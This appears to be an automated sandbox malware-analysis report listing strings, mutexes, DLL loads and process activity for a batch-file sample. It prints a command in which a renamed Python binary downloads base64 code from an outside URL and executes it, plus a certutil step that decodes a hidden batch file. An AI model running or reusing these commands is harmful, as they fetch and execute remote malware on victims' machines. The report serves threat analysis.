0000000C.00000003.1711353903.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1856661526.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1852330899.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1899326202.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1909607190.00000000015B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
Source: __version__.cpython-310.pyc.81528256.12.drString found in binary or memory: https://requests.readthedocs.ioz
Source: synaptics.exe, 0000000C.00000003.1903554609.0000000002230000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1739361059.000000000288E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1898262065.000000000220E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1802177462.0000000002208000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1913139873.0000000002231000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1851098627.0000000002231000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1739695884.000000000297A000.00000004.00000020.00020000.00000000.sdmp, fields.cpython-310.pyc.71107712.12.drString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: synaptics.exe, 0000000C.00000003.1689258541.0000000002170000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1688014912.0000000002369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#appendix-A
Source: synaptics.exe, 0000000C.00000003.1689258541.0000000002170000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1688014912.0000000002369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.3
Source: synaptics.exe, 0000000C.00000003.1910070573.0000000001546000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1785320428.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1871414464.0000000001545000.00000004.00000020.00020000.00000000.sdmp, poolmanager.cpython-310.pyc.45585856.12.drString found in binary or memory: https://twitter.com/
Source: synaptics.exe, 0000000C.00000003.1760995245.000000000244C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1749551270.0000000002446000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1746467587.0000000002443000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1753097448.000000000244C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1746764869.000000000242E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html
Source: synaptics.exe, 0000000C.00000002.1947474885.0000000002B60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: synaptics.exe, 0000000C.00000002.1947474885.0000000002B60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyp
Source: synaptics.exe, 0000000C.00000003.1746467587.0000000002443000.00000004.00000020.00020000.00000000.sdmp, connection.cpython-310.pyc.71163936.12.drString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyz
Source: synaptics.exe, 0000000C.00000003.1864400413.0000000002832000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1871414464.000000000153A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1916003967.000000000284F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1866799112.000000000284F000.00000004.00000020.00020000.00000000.sdmp, socks.cpython-310.pyc.81530416.12.drString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#socks-proxies)
Source: synaptics.exe, 0000000C.00000002.1948123274.0000000002BA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: synaptics.exe, 0000000C.00000003.1736346735.0000000002851000.00000004.00000020.00020000.00000000.sdmp, connectionpool.cpython-310.pyc.45586216.12.drString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN)
Source: certutil.exe, 0000000D.00000002.1631679994.00000222840F0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000D.00000002.1631404205.0000022282284000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000D.00000002.1631467813.00000222822AF000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000D.00000002.1631467813.00000222822A0000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 0000000F.00000002.2531070241.000002A22BFE2000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 0000000F.00000002.2531070241.000002A22BFEE000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000014.00000003.2259867562.00000180F8240000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000014.00000003.2259867562.00000180F8217000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000014.00000002.2262444239.00000180F823C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000014.00000002.2262444239.00000180F8244000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000018.00000002.2530371647.0000026E53A65000.00000004.00000020.00020000.00000000.sdmp, Windows Security.bat.13.drString found in binary or memory: https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL
Source: synaptics.exe, 0000000C.00000003.1924350622.0000000004DC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALLE
Source: synaptics.exe, 0000000C.00000003.1924350622.0000000004DC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/tuyen/tuyen_all
Source: synaptics.exe, 0000000C.00000003.1850523273.00000000015A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1847786019.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc4627.txt
Source: synaptics.exe, 0000000C.00000002.1967352119.000000006C943000.00000002.00000001.01000000.0000000B.sdmp, synaptics.exe, 0000000C.00000002.1965130173.000000006C8A0000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.openssl.org/H
Source: synaptics.exe, 0000000C.00000003.1914186699.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1686843170.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1643639086.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1638636357.0000000001579000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1672297148.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1747587679.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1774464529.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1831947413.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1640711301.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1788341121.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1655004770.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1694132758.00000000015B4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1928633313.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1689015062.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1933461973.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1871414464.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1717365828.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1745249203.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1696902236.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1638636357.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1711353903.00000000015BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
Source: synaptics.exe, 0000000C.00000003.1818690071.0000000002937000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1819220733.0000000001588000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1819220733.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1954077383.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1819786710.0000000002184000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1808094650.0000000002951000.00000004.00000020.00020000.00000000.sdmp, request.cpython-310.pyc.72644880.12.drString found in binary or memory: https://www.python.org/
Source: synaptics.exe, 0000000C.00000003.1661132981.0000000002352000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1672297148.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1664445442.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1662067171.00000000021F6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1662222198.0000000001576000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1679882334.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1662067171.000000000220D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1941420108.0000000002620000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1669301064.0000000002163000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1661132981.00000000022E1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1667220674.000000000220D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1667003174.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1663656056.0000000002352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: synaptics.exe, 0000000C.00000003.1646986798.000000000153A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1650018575.0000000002404000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1940759462.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, functools.cpython-310.pyc.36504736.12.drString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: synaptics.exe, 0000000C.00000002.1936220605.0000000002120000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1635087873.0000000002161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license/
Source: synaptics.exe, 0000000C.00000003.1635023937.0000000001515000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1635023937.0000000001529000.00000004.00000020.00020000.00000000.sdmp, site.cpython-310.pyc.34872536.12.drString found in binary or memory: https://www.python.org/psf/license/)
Source: synaptics.exe, 0000000C.00000003.1797512291.000000000236B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1919136548.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1772647335.0000000002359000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1915578455.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1746467587.000000000247C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1764246172.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1848890032.000000000236C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1740875328.0000000002323000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1751417693.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1743273383.000000000242E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1766171798.000000000235B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1830737958.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1926150995.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1869330974.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1782473835.0000000002359000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1823047315.0000000002368000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1740875328.0000000002361000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1744500063.0000000002361000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1900287289.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1909083590.000000000236D000.00000004.00000020.00020000.00000000.sdmp, response.cpython-310.pyc.45587416.12.drString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: synaptics.exe, synaptics.exe, 0000000C.00000003.1917550687.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1907412471.000000000219D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1937468381.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1927408676.00000000021AB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1867337464.00000000021A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
Source: synaptics.exe, 0000000C.00000003.1917550687.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1907412471.000000000219D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1937468381.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1927408676.00000000021AB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1867337464.00000000021A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/#E
Source: synaptics.exe, 0000000C.00000003.1900287289.000000000239A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1905319819.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1904325037.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1863564990.000000000239A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: synaptics.exe, 0000000C.00000003.1919649165.0000000002433000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1914730730.0000000002430000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1860944335.000000000240E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1906041657.0000000002428000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1903142280.000000000241E000.00000004.00000020.00020000.00000000.sdmp, poolmanager.cpython-310.pyc.45585856.12.drString found in binary or memory: https://yahoo.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: classification engineClassification label: mal48.winZIP@16/367@1/1
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\Public\M20EKMMEH2Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2408:120:WilError_03
Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_03
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tmp\New Text Document.bat" "
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tmp\New Text Document.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\tmp\synaptics.exe "synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat"
Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\NOTEPAD.EXE" C:\Users\user\Desktop\tmp\New Text Document.bat
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Windows Security.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Public\Windows Security.bat
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Windows Security.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Windows Security
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\tmp\synaptics.exe "synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat"Jump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Windows SecurityJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: python310.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: python3.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: libcrypto-1_1.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: libssl-1_1.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: libcrypto-1_1.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certca.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dll
Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\cmd.exeSection loaded: duser.dll
Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exeSection loaded: atlthunk.dll
Source: C:\Windows\System32\cmd.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\cmd.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\cmd.exeSection loaded: coreuicomponents.dll
